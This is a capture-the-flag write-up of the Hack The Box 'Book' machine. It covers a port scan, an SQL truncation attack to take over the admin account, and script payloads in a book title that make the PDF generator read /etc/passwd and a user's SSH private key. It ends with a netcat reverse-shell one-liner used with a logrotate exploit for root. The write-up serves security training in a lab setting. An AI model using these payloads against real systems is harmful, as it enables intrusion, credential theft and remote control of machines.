Capture The Flag

Hack The Box – Book Write Up

Nmap

root@kali:~# nmap -sT -sV 10.10.10.176 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-08 17:12 EDT
Nmap scan report for 10.10.10.176
Host is up (0.049s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 81.73 seconds

User Flag

Visiting the port 80, there is a login page:

Using the sign-up button, we can subscribe a new user and log in the application:

There are several functions but the most interesting one is the Book Submission (we will need it later):

By enumerating more, we can find another login form at http://10.10.10/admin.

We know the admin email address and the login panel for the administrator. We need a way to login as admin@book.htb. Inspecting the source code of at http://book.htb/index.php, we can see there is a restriction on the email and username length:

There is an attack which is applicable where there is a length restriction and the database is missconfigurated: SQL Truncated Attack. This blog explains at the attack, in our case, we have a restriction of 20 characters on the email address, so we need to use the email admin@book.htb followed by 6 spaces and a random character to reach 21 characters. Using burpsuite, I registered a new user with the string “admin@book.htb++++++7” as email:

Using the email admin@book.htb and the password syrion, I was able to lo in the administrator panel:

The Collections function let us download, a pdf containg the users or a pdf containing the collection of books:

Because as normal user, we can submit a book, we are going to focus on that one.Let’s create a book and see what happens when we download the collections:

This is the downloaded PDF, each value in the “link” column links to the relative pdf file:

After different hours of “frustration”, I found this article. So using the following input as Book Title, we are able to read the /etc/passwd file:

<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>

In the collections pdf, we find the passwd content:

We know there is an user called reader, we can try to read it’s ssh key, for this purpose I used the following payload as Book Title:

<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///home/reader/.ssh/id_rsa");x.send();</script>

And yes we got the private key:

Using the private key, we can connect to ssh:

Root Flag

In the user home, there is a folder backups, in this folder there are some log files:

Using psspy, we can see there is a logrotate running by root:

There is an exploit for logrotate here. I create the payload with a bash reverse shell:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.27 4444 >/tmp/f

We have to run  logrotten on the /home/reader/backups/access.log file. After writing the string “syrion” to the access.log file we got the command execution.

Leave a Reply